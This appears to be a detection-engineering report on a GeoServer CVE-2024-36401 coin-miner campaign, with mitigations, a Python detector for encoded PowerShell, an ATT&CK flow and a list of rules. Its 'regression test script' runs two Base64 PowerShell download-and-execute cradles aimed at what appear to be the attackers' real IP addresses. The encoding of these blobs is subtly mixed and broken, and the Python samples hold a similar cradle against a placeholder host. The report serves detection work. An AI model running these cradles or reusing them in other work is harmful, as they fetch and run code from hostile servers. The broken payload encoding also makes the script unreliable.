GeoServer Under Attack: Malware Coin Miner Campaigns
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Threat actors are exploiting the GeoServer remote code execution flaw CVE-2024-36401 to deploy cryptocurrency miners and NetCat on unpatched servers. The activity relies on PowerShell, Bash, and certutil to download and launch XMRig from multiple malicious domains and IP addresses. Several downloader scripts and droppers are used, commonly packaged in ZIP archives and persisted as services through NSSM. The primary objective is to seize compute resources for unauthorized mining.
Investigation
The report outlines three variants (A, B, C) that use encoded PowerShell, Bash-based fetchers, and certutil to retrieve miner payloads from pool.supportxmr.com and multiple aaaaaaaaa.cyou subdomains. Delivery mechanisms include batch scripts, ZIP bundles, and a bespoke downloader named systemd, along with HTTP Basic authentication credentials. Analysts extracted key indicators—URLs, IP addresses, and file names—to support detection and scoping.
Mitigation
Apply GeoServer patches addressing CVE-2024-36401 and keep deployments on the latest supported release. Block outbound connections to known mining pools and related infrastructure, and monitor for suspicious encoded PowerShell or Bash executions. Limit certutil usage for non-admin contexts and enforce application allowlisting to prevent unauthorized services installed via NSSM.
Response
Implement detections for the observed command lines, hashes, and network indicators. Quarantine affected hosts, eradicate miner services and persistence artifacts, and run a forensic sweep for any secondary payloads. Rotate exposed credentials and require multi-factor authentication for administrative access.
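As an added example (not code from the original report), the following Python sketches the process-creation checks the response guidance calls for: it spots the encoded PowerShell argument, decodes the UTF-16LE blob, and looks for download cradles, certutil fetches and the report's hosts. The sample command lines are constructed; sub.aaaaaaaaa.cyou is a placeholder subdomain and 203.0.113.10 an RFC 5737 documentation address.

```python
import base64
import re
# Hosts named in the report; any subdomain of aaaaaaaaa.cyou also counts.
KNOWN_BAD_HOSTS = ("pool.supportxmr.com", "aaaaaaaaa.cyou")
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
CERTUTIL_FETCH = re.compile(r"(?i)certutil(?:\.exe)?\b.*-urlcache\b.*https?://")
CRADLE = re.compile(r"(?i)Net\.WebClient|Download(?:String|File)|Invoke-Expression|\bIEX\b"
                    r"|Invoke-WebRequest|\biwr\b|Start-BitsTransfer|nssm(?:\.exe)?\s+install")
URL_HOST = re.compile(r"(?i)https?://([A-Za-z0-9.-]+)")

def decode_encoded_command(blob):
    """PowerShell -EncodedCommand is Base64 over UTF-16LE; returns None if it does not decode."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_cmdline(cmdline):
    """Reasons one process-creation command line looks like this campaign ([] = nothing seen)."""
    reasons, text = [], cmdline
    m = ENC_FLAG.search(cmdline)
    if m:
        reasons.append("encoded PowerShell argument")
        decoded = decode_encoded_command(m.group(1))
        if decoded is None:
            reasons.append("undecodable -enc blob")  # mangled payloads still deserve a look
        else:
            text = cmdline + " " + decoded  # inspect the plaintext as well as the wrapper
    if CERTUTIL_FETCH.search(cmdline):
        reasons.append("certutil URL fetch")
    c = CRADLE.search(text)
    if c:
        reasons.append("download/execute cradle: " + c.group(0))
    for host in (h.lower() for h in URL_HOST.findall(text)):
        if any(host == b or host.endswith("." + b) for b in KNOWN_BAD_HOSTS):
            reasons.append("known-bad host: " + host)
    return reasons

def ps_encode(command):
    """Build a -enc blob the way PowerShell expects (only used for the constructed samples)."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")

# Constructed samples: sub.aaaaaaaaa.cyou is a placeholder subdomain, 203.0.113.10 an RFC 5737 address.
SAMPLE_CMDLINES = [
    "powershell.exe -nop -w hidden -enc " + ps_encode(
        "IEX (New-Object Net.WebClient).DownloadString('http://sub.aaaaaaaaa.cyou/gw.txt')"),
    "certutil.exe -urlcache -split -f http://203.0.113.10/xmrig.zip C:\\Users\\Public\\x.zip",
    "powershell.exe -Command Get-Date",
]
```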
Attack Flow

graph TB
    %% Class definitions
    classDef action fill:#ffcc99
    classDef builtin fill:#e0e0e0
    classDef malware fill:#ff9999

    %% Node definitions (action = technique, builtin = tool or built-in utility, malware = malware)
    tech_initial_access["<b>Technique</b> – <b>T1210 Exploitation of Remote Services</b><br/>Description: Exploit CVE-2024-36401 in GeoServer for remote code execution"]
    class tech_initial_access action
    tool_geoserver["<b>Tool</b> – <b>Name</b>: GeoServer<br/><b>Vulnerability</b>: CVE-2024-36401"]
    class tool_geoserver builtin
    tech_execution_ps["<b>Technique</b> – <b>T1059.001 PowerShell</b><br/>Description: Run encoded PowerShell commands to download and launch malicious scripts"]
    class tech_execution_ps action
    tool_powershell["<b>Tool</b> – <b>Name</b>: PowerShell"]
    class tool_powershell builtin
    tech_obfuscation["<b>Technique</b> – <b>T1027 Obfuscated Files or Information</b><br/>Description: Base64-encode payloads delivered via certutil and Bash"]
    class tech_obfuscation action
    tool_certutil["<b>Tool</b> – <b>Name</b>: certutil"]
    class tool_certutil builtin
    tool_bash["<b>Tool</b> – <b>Name</b>: Bash"]
    class tool_bash builtin
    tech_deobfuscation["<b>Technique</b> – <b>T1140 Deobfuscate/Decode Files or Information</b><br/>Description: Decode Base64 payloads on the host before execution"]
    class tech_deobfuscation action
    tech_defense_evasion["<b>Technique</b> – <b>T1562 Impair Defenses</b><br/>Description: Disable Windows Defender and add file/path exclusions"]
    class tech_defense_evasion action
    tool_windows_defender["<b>Tool</b> – <b>Name</b>: Windows Defender"]
    class tool_windows_defender builtin
    tech_persistence["<b>Technique</b> – <b>T1543.002 Create or Modify System Process: Systemd Service</b><br/>Description: Use NSSM to install XMRig as a persistent service"]
    class tech_persistence action
    tool_nssm["<b>Tool</b> – <b>Name</b>: NSSM (Non-Sucking Service Manager)"]
    class tool_nssm builtin
    malware_xmrig["<b>Malware</b> – <b>Name</b>: XMRig<br/><b>Purpose</b>: Cryptocurrency mining"]
    class malware_xmrig malware
    tech_impact["<b>Technique</b> – <b>T1496.001 Compute Hijacking</b><br/>Description: Hijack CPU cycles to mine cryptocurrency"]
    class tech_impact action
    tech_indirect_execution["<b>Technique</b> – <b>T1202 Indirect Command Execution</b><br/>Description: PowerShell launches additional scripts via Bash and Netcat"]
    class tech_indirect_execution action
    tool_netcat["<b>Tool</b> – <b>Name</b>: Netcat"]
    class tool_netcat builtin

    %% Connections
    tool_geoserver -->|exploited for| tech_initial_access
    tech_initial_access -->|enables| tech_execution_ps
    tech_execution_ps -->|uses| tool_powershell
    tech_execution_ps -->|downloads via| tool_certutil
    tech_execution_ps -->|invokes| tool_bash
    tech_execution_ps -->|invokes| tool_netcat
    tool_certutil -->|delivers encoded payloads to| tech_obfuscation
    tool_bash -->|executes encoded payloads for| tech_obfuscation
    tech_obfuscation -->|requires| tech_deobfuscation
    tech_deobfuscation -->|prepares environment for| tech_defense_evasion
    tech_defense_evasion -->|disables| tool_windows_defender
    tech_defense_evasion -->|leads to| tech_persistence
    tech_persistence -->|uses| tool_nssm
    tool_nssm -->|installs| malware_xmrig
    malware_xmrig -->|performs| tech_impact
    tech_execution_ps -->|triggers| tech_indirect_execution
    tech_indirect_execution -->|uses| tool_bash
    tech_indirect_execution -->|uses| tool_netcat
    tech_indirect_execution -->|facilitates| malware_xmrig
Detections
- Disabling Windows Defender Protections (via registry_event)
- Windows Defender Preferences Suspicious Changes (via powershell)
- Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via registry_event)
- Schtasks Points to Suspicious Directory / Binary / Script (via cmdline)
- Suspicious Files in Public User Profile (via file_event)
- Download or Upload via Powershell (via cmdline)
- IOCs (SourceIP) to detect: Malware Coin Miner Attack Cases Targeting GeoServer
- IOCs (DestinationIP) to detect: Malware Coin Miner Attack Cases Targeting GeoServer
- IOCs (HashMd5) to detect: Malware Coin Miner Attack Cases Targeting GeoServer
- Detect Certutil Usage for Malicious Payload Download Exploiting GeoServer Vulnerabilities [Windows Process Creation]
- Detect Encoded PowerShell Commands Targeting GeoServer Vulnerabilities [Windows Powershell]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
Attack Narrative & Commands:
An attacker has obtained a malicious Base64 payload that downloads a vulnerable GeoServer configuration file, executes it, and then drops a cryptocurrency miner. To evade simple script-block detection, the attacker uses the -enc switch with a pre-encoded string (one of the two known IOCs). The attacker runs the payload locally on a compromised Windows host, causing a powershell.exe process creation that includes the exact Base64 string the rule watches for.
Regression Test Script:
# -------------------------------------------------
# Regression script to trigger the Sigma rule
# -------------------------------------------------
# Payload 1 (matches first IOC)
$b64_1 = 'SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMjIwLjg0LjEwNy42OS9qcy9ndy50eHQnKQA='
powershell.exe -enc $b64_1

# Payload 2 (matches second IOC)
$b64_2 = 'SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8xMTkuMTk0LjE1My4zMTo4MDgwL2ljb24vanMvd2kudHh0Jyk='
powershell.exe -enc $b64_2
Cleanup Commands:
# -------------------------------------------------
# Cleanup – terminate any lingering PowerShell payloads
# -------------------------------------------------
# Get-Process does not expose the command line of processes it did not start
# (StartInfo.Arguments is empty), so match on Win32_Process.CommandLine instead.
Get-CimInstance Win32_Process -Filter "Name = 'powershell.exe'" |
    Where-Object { $_.CommandLine -match '-enc' } |
    ForEach-Object { Stop-Process -Id $_.ProcessId -Force -ErrorAction SilentlyContinue }